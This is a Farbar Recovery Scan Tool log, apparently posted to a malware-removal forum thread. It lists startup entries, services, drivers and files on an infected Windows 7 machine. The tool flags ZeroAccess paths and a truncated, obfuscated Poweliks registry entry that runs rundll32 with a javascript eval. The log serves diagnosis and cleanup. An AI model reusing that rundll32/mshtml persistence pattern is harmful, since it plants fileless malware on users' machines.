HKLM\...\Run: [SmartMenu] => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe [610360 2009-07-08] ()
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [499608 2011-06-16] (Adobe Systems Incorporated)
HKLM\...\Run: [CanonMyPrinter] => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe [2779024 2011-03-14] (CANON INC.)
HKLM-x32\...\Run: [hpsysdrv] => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe [62768 2008-11-20] (Hewlett-Packard)
HKLM-x32\...\Run: [UpdatePRCShortCut] => C:\Program Files (x86)\Hewlett-Packard\Recovery\MUITransfer\MUIStartMenu.exe [222504 2009-05-20] (CyberLink Corp.)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284696 2010-03-03] (Intel Corporation)
HKLM-x32\...\Run: [57xxSteelVine] => C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVineManager.exe [1720320 2007-08-20] ()
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [49208 2011-05-10] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [RIMBBLaunchAgent.exe] => C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\RIMBBLaunchAgent.exe [90448 2011-09-01] (Research In Motion Limited)
HKLM-x32\...\Run: [AMD AVT] => C:\Program Files (x86)\AMD AVT\bin\kdbsync.exe [10752 2012-01-31] ()
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [641664 2012-04-06] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [CTxfiHlp] => CTXFIHLP.EXE
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [253816 2013-03-12] (Oracle Corporation)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [413696 2009-01-05] (Apple Inc.)
HKLM-x32\...\Run: [CanonSolutionMenuEx] => C:\Program Files (x86)\Canon\Solution Menu EX\CNSEMAIN.EXE [1612920 2011-08-04] (CANON INC.)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2013\avgui.exe [4411952 2014-01-21] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKLM\...\InprocServer32: [Default-wbemess] wbemess.dll ATTENTION! ====> ZeroAccess?
HKLM\...D6A79037F57F\InprocServer32: [Default-fastprox] fastprox.dll ATTENTION! ====> ZeroAccess?
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Run: [SpybotSD TeaTimer] => C:\Program Files (x86)\Spybot - Search & Destroy\TeaTimer.exe
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Run: [SansaDispatch] => C:\Users\JP\AppData\Roaming\SanDisk\Sansa Updater\SansaDispatch.exe [79872 2010-10-16] (SanDisk Corporation)
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Run: [DownloadAccelerator] => C:\Program Files (x86)\DAP\DAP.EXE [4242064 2014-10-04] (Speedbit Ltd.)
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...409d6c4515e9\InprocServer32: [Default-shell32]  <==== ATTENTION!
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\Users\JP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Core Temp.lnk
ShortcutTarget: Core Temp.lnk -> C:\Program Files\Core Temp\Core Temp.exe ()
BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x410DF1D8953FCD01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
BHO: No Name -> {DBC80044-A445-435b-BC74-9C25C1C588A9} ->  No File
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO-x32: Microsoft Live Search Toolbar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> c:\Program Files (x86)\MSN\Toolbar\3.0.0560.0\msneshellx.dll (Microsoft Corp.)
BHO-x32: SpeedBit Link Verification Helper -> {D5974A72-C81C-4DC3-BE77-A8A7BBC8864E} -> C:\Program Files (x86)\DAP\LinkVerifier.dll (Speedbit Ltd.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM-x32 - Microsoft Live Search Toolbar - {1E61ED7C-7CB8-49d6-B9E9-AB4C880C8414} - c:\Program Files (x86)\MSN\Toolbar\3.0.0560.0\msneshellx.dll (Microsoft Corp.)
Toolbar: HKCU - No Name - {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} -  No File
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
DPF: HKLM-x32 {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/download/C/0/C/C0CBBA88-A6F2-48D9-9B0E-1719D1177202/LegitCheckControl.cab
DPF: HKLM-x32 {6A060448-60F9-11D5-A6CD-0002B31F7455}
DPF: HKLM-x32 {8AD9C840-044E-11D1-B3E9-00805F499D93}
DPF: HKLM-x32 {CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA}
DPF: HKLM-x32 {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA}
DPF: HKLM-x32 {D4B68B83-8710-488B-A692-D74B50BA558E} http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: HKLM-x32 {E705A591-DA3C-4228-B0D5-A356DBA42FBF} http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://employee.bnsf.com/dana-cached/sc/JuniperSetupClient.cab
DPF: HKLM-x32 {F6ACF75C-C32C-447B-9BEF-46B766368D29} http://ccfiles.creative.com/Web/softwareupdate/ocx/110926/CTPID.cab
DPF: HKLM-x32 {FA5D9BCA-4653-49FB-9237-FFA947877414} http://192.168.1.10/ZDVR.CAB
Handler: ipp\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} -  No File
Handler-x32: http\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: http\oledb - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: https\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: https\oledb - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: ipp\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: msdaipp\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: msdaipp\oledb - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 8.8.8.8 24.178.162.3 24.247.15.53

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL (CANON INC.)
FF Plugin-x32: @java.com/DTPlugin,version=10.25.2 -> C:\Windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.25.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @RIM.com/WebSLLauncher,version=1.0 -> C:\Program Files (x86)\Common Files\Research In Motion\BBWebSLLauncher\NPWebSLLauncher.dll ()
FF Plugin-x32: @videolan.org/vlc,version=2.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM-x32\...\Firefox\Extensions: [daplinkchecker@speedbit.com] - C:\Program Files (x86)\DAP\daplinkchecker
FF Extension: DAP Link Checker - C:\Program Files (x86)\DAP\daplinkchecker [2014-10-04]

Chrome:
=======
CHR Profile: C:\Users\JP\AppData\Local\Google\Chrome\User Data\Default

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 57xx SteelVine Manager; C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVine.exe [1282048 2007-08-20] () [File not signed]
R2 AdobeActiveFileMonitor10.0; C:\Program Files (x86)\Adobe\Elements 10 Organizer\PhotoshopElementsFileAgent.exe [169624 2011-09-01] (Adobe Systems Incorporated)
R2 AntsCMSService; C:\Program Files (x86)\Single Video Surveillance Client\AntsCMSService.exe [2403328 2013-03-07] (ANTS) [File not signed]
R2 AntsSTSService; C:\Program Files (x86)\Single Video Surveillance Client\AntsSTSService.exe [2038784 2013-03-02] () [File not signed]
S2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2013\avgidsagent.exe [4939312 2013-07-04] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2013\avgwdsvc.exe [283136 2013-11-20] (AVG Technologies CZ, s.r.o.)
S3 Creative ALchemy AL6 Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\AL6Licensing.exe [79360 2012-08-02] (Creative Labs) [File not signed]
S3 Creative Audio Engine Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe [79360 2012-08-02] (Creative Labs) [File not signed]
S3 Creative Media Toolbox 6 Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\MT6Licensing.exe [79360 2012-08-02] (Creative Labs) [File not signed]
R2 CTAudSvcService; C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe [286720 2010-02-12] (Creative Technology Ltd) [File not signed]
R2 HPBtnSrv; C:\Program Files (x86)\Hewlett-Packard\HP Easy Backup\HPBtnSrv.exe [192512 2008-09-30] () [File not signed]
R2 LightScribeService; C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2011-06-20] (Hewlett-Packard Company) [File not signed]
R2 nTuneService; C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneService.exe [276584 2009-11-06] (NVIDIA)
S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [117264 2009-10-20] (CACE Technologies, Inc.)
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
R2 VZWConfigService; C:\Program Files (x86)\Novatel Wireless\LTE Support\VZWMSConfig.exe [218160 2012-04-16] (Novatel Wireless Inc.)
R2 MYSQL; "C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld" MYSQL [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 61883; C:\Windows\System32\DRIVERS\61883.sys [60288 2009-07-13] (Microsoft Corporation)
S3 AtiHDAudioService; C:\Windows\System32\drivers\AtihdW76.sys [96768 2013-02-14] (Advanced Micro Devices) [File not signed]
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [246072 2013-11-25] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [71480 2013-07-20] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [206648 2013-07-20] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [311608 2013-07-20] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [116536 2013-07-01] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [45880 2013-10-23] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [240952 2014-04-15] (AVG Technologies CZ, s.r.o.)
R2 NPF; C:\Windows\System32\drivers\npf.sys [47632 2009-10-20] (CACE Technologies, Inc.)
R3 nvoclk64; C:\Windows\System32\DRIVERS\nvoclk64.sys [42088 2009-09-15] (NVIDIA Corp.)
S3 NwGPSOverWiFi64; C:\Windows\System32\DRIVERS\nwvcomnet64.sys [37888 2012-09-27] (Novatel Wireless Inc.)
S3 NWUSBLAN_4620; C:\Windows\System32\DRIVERS\nwblan_4620.sys [47472 2012-09-27] (Belcarra Technologies)
R3 nwusbserial; C:\Windows\System32\DRIVERS\nwvcomnet64.sys [37888 2012-09-27] (Novatel Wireless Inc.)
R3 PPorts; C:\Windows\System32\DRIVERS\PPorts.sys [95744 2009-07-23] ()
R3 RimVSerPort; C:\Windows\System32\DRIVERS\RimSerial_AMD64.sys [44032 2011-07-20] (Research in Motion Ltd)
S3 RivaTuner64; C:\Program Files (x86)\RivaTuner v2.24 MSI Master Overclocking Arena 2009 edition\RivaTuner64.sys [19952 2010-01-06] ()
S3 Ser2ph; C:\Windows\System32\DRIVERS\ser2ph64.sys [89600 2008-03-06] (Prolific Technology Inc.)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [34808 2014-10-20] ()
R3 ALSysIO; \??\C:\Users\JP\AppData\Local\Temp\ALSysIO64.sys [X]
S3 PcdrNdisuio; syswow64\drivers\pcdrndisuio.sys [X]
S3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0; \??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms [X]
S3 RimUsb; System32\Drivers\RimUsb_AMD64.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-20 18:16 - 2014-10-20 18:16 - 00002606 _____ () C:\Users\JP\Desktop\JRT.txt
2014-10-20 18:12 - 2014-10-20 18:12 - 00000000 ____D () C:\Windows\ERUNT
2014-10-20 17:38 - 2014-10-20 17:45 - 00000000 ____D () C:\AdwCleaner
2014-10-20 08:30 - 2014-10-20 18:18 - 00000000 ____D () C:\FRST
2014-10-18 22:06 - 2014-10-18 22:06 - 00000064 _____ () C:\Windows\GPlrLanc.dat
2014-10-18 15:21 - 2014-10-18 15:21 - 00018835 _____ () C:\Users\JP\Desktop\dds.txt
2014-10-18 15:21 - 2014-10-18 15:21 - 00017360 _____ () C:\Users\JP\Desktop\attach.txt
2014-10-18 00:12 - 2014-10-18 01:08 - 00000000 ____D () C:\Users\JP\AppData\Local\CrashDumps
2014-10-17 22:49 - 2014-10-17 22:50 - 00002428 _____ () C:\Users\JR\Desktop\Rkill.txt
2014-10-17 22:43 - 2014-10-17 22:43 - 00000000 ____D () C:\Windows\System32\Tasks\Safer-Networking
2014-10-17 22:42 - 2014-10-17 22:46 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 2
2014-10-17 22:42 - 2014-10-17 22:42 - 00001397 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-10-17 22:42 - 2014-10-17 22:42 - 00001385 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2014-10-17 22:42 - 2014-10-17 22:42 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-10-17 22:42 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\Windows\system32\sdnclean64.exe
2014-10-17 22:37 - 2014-10-20 17:47 - 00000666 _____ () C:\Windows\PFRO.log
2014-10-17 22:16 - 2014-10-20 17:15 - 00034808 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-10-17 22:16 - 2014-10-17 22:16 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-10-17 21:36 - 2014-10-17 21:36 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Share-to-Web Upload Folder
2014-10-17 21:10 - 2014-10-17 21:10 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Adobe
2014-10-17 21:09 - 2014-10-17 21:09 - 00001449 _____ () C:\Users\JR\Desktop\IE.lnk
2014-10-17 21:09 - 2014-10-17 21:09 - 00001415 _____ () C:\Users\JR\Desktop\IE (64-bit).lnk
2014-10-17 20:58 - 2014-10-17 20:58 - 00119024 _____ () C:\Users\JR\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Intel Corporation
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Canon
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Roaming\AVG2013
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Roaming\ATI
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Local\Hewlett-Packard
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Local\Avg2013
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Local\ATI
2014-10-17 20:57 - 2014-10-17 20:57 - 00001449 _____ () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-17 20:57 - 2014-10-17 20:57 - 00001415 _____ () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-10-17 20:57 - 2014-10-17 20:57 - 00000020 ___SH () C:\Users\JR\ntuser.ini
2014-10-17 20:57 - 2014-10-17 20:57 - 00000000 ____D () C:\Users\JR\AppData\Local\VirtualStore
2014-10-17 20:57 - 2014-10-17 20:57 - 00000000 ____D () C:\Users\JR\AppData\Local\NVIDIA Corporation
2014-10-17 20:57 - 2014-10-17 20:57 - 00000000 ____D () C:\Users\JR\AppData\Local\Adobe
2014-10-17 20:57 - 2014-10-17 20:57 - 00000000 ____D () C:\Users\JR
2014-10-17 20:57 - 2012-09-21 09:10 - 00000000 ____D () C:\Users\JR\AppData\Roaming\TuneUp Software
2014-10-17 20:57 - 2009-12-13 17:53 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Macromedia
2014-10-17 20:57 - 2009-12-03 18:41 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Recovery Manager
2014-10-17 20:57 - 2009-07-13 23:54 - 00000000 ___RD () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-17 20:57 - 2009-07-13 23:49 - 00000000 ___RD () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-10-17 20:22 - 2014-10-17 20:28 - 00005786 _____ () C:\Users\JP\Desktop\Rkill.txt
2014-10-17 19:48 - 2014-10-20 17:54 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-17 19:47 - 2014-10-20 17:53 - 00001108 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-17 19:47 - 2014-10-20 17:53 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-17 19:47 - 2014-10-20 17:53 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-17 19:47 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-17 19:47 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-17 18:43 - 2014-10-20 17:48 - 00000560 _____ () C:\Windows\setupact.log
2014-10-17 18:43 - 2014-10-17 18:43 - 00000000 _____ () C:\Windows\setuperr.log
2014-10-04 14:56 - 2014-10-17 00:48 - 00000000 ____D () C:\Users\Public\Documents\Speedbit
2014-10-04 14:51 - 2014-10-20 16:55 - 00001290 _____ () C:\Users\JP\Desktop\My DAP Downloads.lnk
2014-10-04 14:51 - 2014-10-04 14:51 - 00001041 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Download Accelerator Plus (DAP).lnk
2014-10-04 14:51 - 2014-10-04 14:51 - 00000941 _____ () C:\Users\JP\Desktop\DAP.lnk
2014-10-04 14:51 - 2014-10-04 14:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Download Accelerator Plus (DAP)

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-20 18:18 - 2012-04-23 21:54 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-20 17:56 - 2009-07-13 23:45 - 00017168 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-20 17:56 - 2009-07-13 23:45 - 00017168 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-20 17:54 - 2009-07-14 00:13 - 00730384 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-20 17:52 - 2011-12-29 02:14 - 01735147 _____ () C:\Windows\WindowsUpdate.log
2014-10-20 17:49 - 2009-12-03 18:17 - 00000000 ____D () C:\ProgramData\Temp
2014-10-20 17:48 - 2013-01-30 22:44 - 00000354 _____ () C:\Windows\Tasks\ROC_PAID_JAN2013_TB_rmv.job
2014-10-20 17:48 - 2013-01-26 11:51 - 00000354 _____ () C:\Windows\Tasks\ROC_JAN2013_TB_rmv.job
2014-10-20 17:48 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-20 17:38 - 2012-09-08 10:10 - 00000000 ____D () C:\ProgramData\MFAData
2014-10-20 16:23 - 2012-08-06 17:29 - 00000000 ____D () C:\Users\JP\AppData\Roaming\vlc
2014-10-20 08:19 - 2009-12-03 18:13 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information
2014-10-17 22:43 - 2009-12-15 23:07 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-10-17 22:37 - 2009-12-15 23:07 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy
2014-10-17 19:47 - 2012-05-31 22:39 - 00000000 ____D () C:\Users\JP\AppData\Roaming\Malwarebytes
2014-10-17 19:47 - 2009-12-15 21:35 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-17 19:47 - 2009-12-15 21:35 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-10-17 00:29 - 2013-01-21 01:54 - 00000000 ____D () C:\Windows\Minidump
2014-10-08 02:44 - 2010-03-05 23:29 - 00000049 _____ () C:\Windows\NeroDigital.ini
2014-10-04 22:22 - 2012-05-31 22:54 - 00000000 ____D () C:\Users\JP\Documents\Vegas Movie Studio PE 9.0 Projects
2014-10-04 14:52 - 2014-01-14 17:49 - 00000000 ____D () C:\Program Files (x86)\DAP
2014-10-04 14:51 - 2014-01-14 17:49 - 00000000 ____D () C:\ProgramData\SpeedBit
2014-10-04 14:51 - 2012-05-30 22:39 - 00000000 ___RD () C:\Users\JP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-01 11:11 - 2009-12-15 21:35 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-09-26 14:50 - 2012-11-18 15:51 - 00003168 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForJP
2014-09-26 14:50 - 2012-11-18 15:51 - 00000320 _____ () C:\Windows\Tasks\HPCeeScheduleForJP.job
2014-09-24 03:36 - 2012-04-23 21:54 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-09-24 03:36 - 2012-04-23 21:54 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-09-24 03:36 - 2011-05-21 10:17 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl

ZeroAccess:
C:\Users\JP\AppData\Local\{f74e7a95-1d32-0366-baea-5ce012d107ec}
C:\Users\JP\AppData\Local\{f74e7a95-1d32-0366-baea-5ce012d107ec}\@

Some content of TEMP:
====================
C:\Users\JP\AppData\Local\Temp\cabex.dll
C:\Users\JP\AppData\Local\Temp\dllnt_dump.dll
C:\Users\JP\AppData\Local\Temp\Quarantine.exe
C:\Users\JP\AppData\Local\Temp\sqlite3.dll
C:\Users\JP\AppData\Local\Temp\VARemove.exe
C:\Users\JP\AppData\Local\Temp\VAUninstall.exe
C:\Users\JR\AppData\Local\Temp\dllnt_dump.dll

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-16 19:00

==================== End Of Log ============================



#7 padjr

padjr
  • Topic Starter

